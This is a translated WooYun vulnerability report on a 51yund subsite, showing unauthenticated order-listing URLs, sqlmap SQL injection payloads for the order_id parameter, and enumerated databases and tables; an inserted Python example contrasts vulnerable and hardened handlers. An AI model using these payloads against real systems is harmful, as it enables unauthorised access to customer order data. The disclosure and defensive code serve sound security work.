Vulnerability summary

Defect ID: wooyun-2015-096815

Title: Unauthorized access to order information + SQL injection (cross-database) on a 悦动圈 (51yund) subsite

Vendor: 51yund.com

Author: Ton7BrEak

Submitted: 2015-02-11 16:49

Fixed: 2015-03-28 16:50

Published: 2015-03-28 16:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-02-11: Details sent to the vendor, awaiting vendor handling
2015-02-12: Vendor confirmed; details visible to the vendor only
2015-02-22: Details disclosed to core white hats and domain experts
2015-03-04: Details disclosed to regular white hats
2015-03-14: Details disclosed to intern white hats
2015-03-28: Details disclosed to the public

Brief description:

Continuing to dig deeper from the previous report~

Detailed description:

1. Unauthorized access
http://car.51yund.com/mobile/get_all_nopay_order.php

[screenshot: 001.jpg]

http://car.51yund.com/mobile/get_all_pay_order.php

[screenshot: 002.jpg]

2. An injection point on this site. Testing showed that the site has no SQL injection defenses at all, and database information can be extracted from many places.
http://car.51yund.com/mobile/order_info.php?order_id=2755

Place: GET
Parameter: order_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: order_id=2755 AND 1189=1189
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: order_id=2755 AND (SELECT 8189 FROM(SELECT COUNT(*),CONCAT(0x3a7669613a,(SELECT (CASE WHEN (8189=8189) THEN 1 ELSE 0 END)),0x3a6f6b773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: order_id=2755 AND SLEEP(5)
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
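Both findings above come from the same root cause: an order endpoint that interpolates a request parameter straight into SQL and never checks who is asking. The following is an added example, not code from the report or from 51yund; it models a minimal order-lookup handler in two forms against an in-memory SQLite database. The vulnerable form reproduces the boolean-based blind oracle from the sqlmap output (the `AND 1189=1189` payload), and the hardened form validates the parameter, binds it, and scopes every query to the authenticated user, which also closes the unauthenticated order listing. Table and column names (`orders`, `order_id`, `user_id`, `amount`, `paid`) and the sample rows are assumptions; MySQL-only functions such as `SLEEP()` do not exist in SQLite, so only the boolean-based payload shape is exercised.

```python
import re
import sqlite3


def build_db():
    """Constructed sample database standing in for the site's order table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (order_id INTEGER PRIMARY KEY, user_id INTEGER, "
        "amount INTEGER, paid INTEGER)"
    )
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?, ?, ?)",
        [(2755, 7, 120, 0), (2756, 8, 45, 1)],  # constructed rows
    )
    return conn


def order_info_vulnerable(conn, order_id):
    """Models the reported behaviour: the parameter is concatenated into SQL,
    so an appended condition changes the result set and acts as a true/false
    oracle (AND 1189=1189 returns the row, AND 1189=1190 returns nothing)."""
    sql = "SELECT order_id, user_id, amount FROM orders WHERE order_id=" + order_id
    return conn.execute(sql).fetchall()


class InvalidParameter(ValueError):
    pass


class Forbidden(PermissionError):
    pass


def order_info_hardened(conn, order_id, current_user_id):
    """Hardened form: require a session, accept only a decimal integer,
    bind the value, and restrict the row to the calling user's own orders."""
    if current_user_id is None:
        raise Forbidden("login required")
    if not isinstance(order_id, str) or not re.fullmatch(r"[0-9]{1,18}", order_id):
        raise InvalidParameter("order_id must be a positive integer")
    row = conn.execute(
        "SELECT order_id, user_id, amount FROM orders "
        "WHERE order_id=? AND user_id=?",
        (int(order_id), current_user_id),
    ).fetchone()
    if row is None:
        # Same response for "does not exist" and "belongs to someone else",
        # so the endpoint cannot be used to enumerate other users' order ids.
        raise Forbidden("no such order for this user")
    return row


def list_unpaid_orders_hardened(conn, current_user_id):
    """Replacement for an unauthenticated get_all_nopay_order-style listing:
    the caller only ever sees their own unpaid orders."""
    if current_user_id is None:
        raise Forbidden("login required")
    return conn.execute(
        "SELECT order_id, amount FROM orders WHERE paid=0 AND user_id=?",
        (current_user_id,),
    ).fetchall()


def outcome(fn, *args):
    """Return the function result, or the exception class name if it raises."""
    try:
        return fn(*args)
    except Exception as exc:  # noqa: BLE001 - demo helper
        return type(exc).__name__


def demo():
    conn = build_db()
    return {
        "vuln_true": outcome(order_info_vulnerable, conn, "2755 AND 1189=1189"),
        "vuln_false": outcome(order_info_vulnerable, conn, "2755 AND 1189=1190"),
        "hard_ok": outcome(order_info_hardened, conn, "2755", 7),
        "hard_payload": outcome(order_info_hardened, conn, "2755 AND 1189=1189", 7),
        "hard_other_user": outcome(order_info_hardened, conn, "2755", 8),
        "hard_anonymous": outcome(order_info_hardened, conn, "2755", None),
        "unpaid_user7": outcome(list_unpaid_orders_hardened, conn, 7),
        "unpaid_user8": outcome(list_unpaid_orders_hardened, conn, 8),
        "unpaid_anonymous": outcome(list_unpaid_orders_hardened, conn, None),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The integer check is deliberately a whitelist rather than a blacklist of SQL keywords: the error-based and time-based payloads in the sqlmap output differ in shape but all fail the same `[0-9]+` test, and the bound parameter means even a value that passes the check is never parsed as SQL.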

Proof of vulnerability:

1. Databases

available databases [14]:
[*] cacti
[*] information_schema
[*] mycar
[*] mycar_test
[*] mysql
[*] performance_schema
[*] question
[*] spilder_dianping
[*] sport
[*] sport_cms
[*] sport_test
[*] test
[*] xyy_db
[*] yd_sns


2. Data from one of the databases

Database: cacti
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| graph_templates_item | 328 |
| graph_template_input_defs | 257 |
| data_input_data | 243 |
| data_template_data_rra | 224 |
| colors | 101 |
| data_template_rrd | 77 |
| graph_template_input | 77 |
| snmp_query_graph_rrd_sv | 59 |
| data_template_data | 56 |
| data_input_fields | 46 |
| data_template | 41 |
| graph_templates_graph | 41 |
| snmp_query_graph_sv | 40 |
| snmp_query_graph_rrd | 39 |
| host_snmp_cache | 36 |
| graph_templates | 33 |
| snmp_query_graph | 19 |
| user_auth_realm | 18 |
| poller_item | 17 |
| cdef_items | 16 |
| data_local | 15 |
| host_template_graph | 14 |
| settings | 14 |
| host_template_snmp_query | 13 |
| data_input | 12 |
| user_log | 11 |
| rra_cf | 10 |
| graph_local | 8 |
| snmp_query | 8 |
| host_template | 7 |
| cdef | 6 |
| rra | 5 |
| host_graph | 4 |
| graph_templates_gprint | 3 |
| host | 2 |
| host_snmp_query | 2 |
| plugin_hooks | 2 |
| user_auth | 2 |
| `version` | 1 |
| graph_tree | 1 |
| graph_tree_items | 1 |
| plugin_realms | 1 |
| poller_reindex | 1 |
| poller_time | 1 |
+---------------------------+---------+

Fix recommendation:

0.0

Copyright notice: please credit the source when reposting: Ton7BrEak@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-02-12 14:54

Vendor reply:

The programmer has been punished by being made to kneel on the keyboard while coding~~

Latest status:

None yet